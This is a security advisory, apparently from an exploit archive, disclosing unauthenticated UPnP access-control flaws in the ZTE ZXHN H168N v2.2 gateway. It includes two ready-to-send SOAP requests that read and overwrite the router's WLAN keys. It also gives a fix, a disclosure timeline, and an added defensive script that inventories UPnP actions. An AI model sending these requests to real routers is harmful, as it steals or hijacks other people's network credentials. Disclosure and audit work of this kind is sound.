ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability
2018-12-11T00:00:00
ID: 1337DAY-ID-31756 | Type: zdt | Reporter: Usman Saeed | Modified: 2018-12-11T00:00:00
Description
ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for educational purposes; I would not be responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Hardware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not expose privileged configuration actions such as GetSecurityKeys and SetSecurityKeys to unauthenticated clients; where a firmware fix is not available, UPnP should be disabled on the affected devices.
[*] Note:
Other services that should not be published over UPnP are not listed in this blog post, since the remediation is the same.
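A way to act on the solution and the note above. This is an added example, not the advisory's or ZTE's code: it parses a UPnP device description to find every advertised service and control URL, reads each service's SCPD action list, and flags action names that suggest credential access, so an operator can see what a gateway publishes over UPnP and re-check after disabling it or applying the update. The description URL (devices announce it over SSDP; the path used here is assumed), the sample documents and the name heuristic are this example's own assumptions; the WLANConfiguration service, control path and the two action names come from the advisory.

```python
"""Added example (not the advisory's code): list the actions a gateway advertises
over UPnP and flag the ones whose names suggest they read or write credentials."""
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Name fragments that mark an action as credential-related. Heuristic chosen for
# this example; GetSecurityKeys/SetSecurityKeys from the advisory match "Key".
SENSITIVE_MARKERS = ("Key", "Password", "Passphrase", "Secret", "Credential")


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def parse_device_description(xml_bytes, base_url):
    """(serviceType, absolute controlURL, absolute SCPDURL) for every <service>,
    walking embedded devices too (the WLAN service sits under LANDevice)."""
    services = []
    for svc in ET.fromstring(xml_bytes).iter():
        if _local(svc.tag) != "service":
            continue
        f = {_local(c.tag): (c.text or "").strip() for c in svc}
        services.append((f.get("serviceType", ""),
                         urllib.parse.urljoin(base_url, f.get("controlURL", "")),
                         urllib.parse.urljoin(base_url, f.get("SCPDURL", ""))))
    return services


def parse_scpd(xml_bytes):
    """Sorted action names from a service's SCPD document."""
    names = []
    for action in ET.fromstring(xml_bytes).iter():
        if _local(action.tag) == "action":
            names += [(n.text or "").strip() for n in action if _local(n.tag) == "name"]
    return sorted(names)


def sensitive_actions(actions):
    """Subset of action names matching SENSITIVE_MARKERS."""
    return [a for a in actions if any(m in a for m in SENSITIVE_MARKERS)]


def inventory(description_url, timeout=5.0):
    """Live walk (not exercised offline): description -> each SCPD -> flagged actions."""
    desc = urllib.request.urlopen(description_url, timeout=timeout).read()
    report = {}
    for stype, ctrl, scpd in parse_device_description(desc, description_url):
        actions = parse_scpd(urllib.request.urlopen(scpd, timeout=timeout).read())
        report[stype] = {"controlURL": ctrl, "actions": len(actions),
                         "sensitive": sensitive_actions(actions)}
    return report


# Constructed documents (not captured from a device); the service type, control
# path and the two flagged actions are those named in the advisory.
SAMPLE_DESCRIPTION = b"""<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
 <deviceType>urn:dslforum-org:device:InternetGatewayDevice:1</deviceType>
 <deviceList><device>
  <deviceType>urn:dslforum-org:device:LANDevice:1</deviceType>
  <serviceList><service>
   <serviceType>urn:dslforum-org:service:WLANConfiguration:1</serviceType>
   <serviceId>urn:dslforum-org:serviceId:WLANConfiguration1</serviceId>
   <controlURL>/control/igd/wlanc_1_1</controlURL>
   <SCPDURL>/scpd/wlanc.xml</SCPDURL>
  </service></serviceList>
 </device></deviceList>
</device></root>"""

SAMPLE_SCPD = b"""<?xml version="1.0"?>
<scpd xmlns="urn:dslforum-org:service-1-0"><actionList>
 <action><name>GetInfo</name></action>
 <action><name>GetSecurityKeys</name></action>
 <action><name>SetSecurityKeys</name></action>
 <action><name>GetTotalAssociations</name></action>
</actionList></scpd>"""

if __name__ == "__main__":
    # Assumed description URL; a real one is learned from the device's SSDP LOCATION header.
    base = "http://192.0.2.1:52869/description.xml"
    for stype, ctrl, scpd in parse_device_description(SAMPLE_DESCRIPTION, base):
        print(stype, ctrl, sensitive_actions(parse_scpd(SAMPLE_SCPD)))
```

Against a real device, call inventory() with the LOCATION URL from its SSDP reply. An empty "sensitive" list for every service, or no description at all once UPnP is disabled, is the state to aim for; any flagged action should then be tested for authorization before the device is considered fixed.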
[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE-2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
# 0day.today [2018-12-12] #